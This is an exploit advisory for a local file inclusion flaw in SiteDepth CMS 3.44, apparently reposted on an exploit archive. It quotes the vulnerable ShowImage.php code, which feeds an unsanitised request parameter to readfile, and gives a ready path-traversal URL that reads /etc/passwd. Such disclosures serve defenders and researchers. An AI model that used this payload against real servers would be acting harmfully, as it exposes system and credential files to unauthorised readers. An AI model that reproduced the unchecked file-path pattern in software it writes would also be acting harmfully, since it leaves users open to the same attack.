SiteDepth CMS version 3.44 suffers from a classic local file inclusion vulnerability in ShowImage.php.
e935915db163e0614b51e2261d97467ae97d3dfb9dd295401fec57822ed52acf__________________________________________________________________________
[*] Sitedepth CMS 3.44 Local File Include LFI Exploit
__________________________________________________________________________
[!] Application homepage : http://www.sitedepth.com/
[!] Author : H4 / Team XPK
[!] Contact : H4_XPK@hotmail.com
[!] Bug discovered : 2006-11-07
[!] Bug published : 2007-06-25
---------------------------------------------------------------------
Vuln. code: ShowImage.php
<?php
include 'sitedepth.php';
$content_type = 'image/jpeg';
$filename = SD_DIRS_REPOS . '/html/' . $_GET['name'];
$filename_show = $_GET['name'];
header ('Content-type: ' . $content_type);
header ('Content-Disposition: inline; filename=' . $filename_show);
readfile ($filename); <-------------- BAD!
?>
---------------------------------------------------------------------
[!] Exploitation : http://noobie.com/sitedepth/ShowImage.php?name=../../../../../../../../etc/passwd
---------------------------------------------------------------------
[!] Sometimes it`s time to give instead of taking :)
[!] Greetz to Angeldust & Streets and to rest of community.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed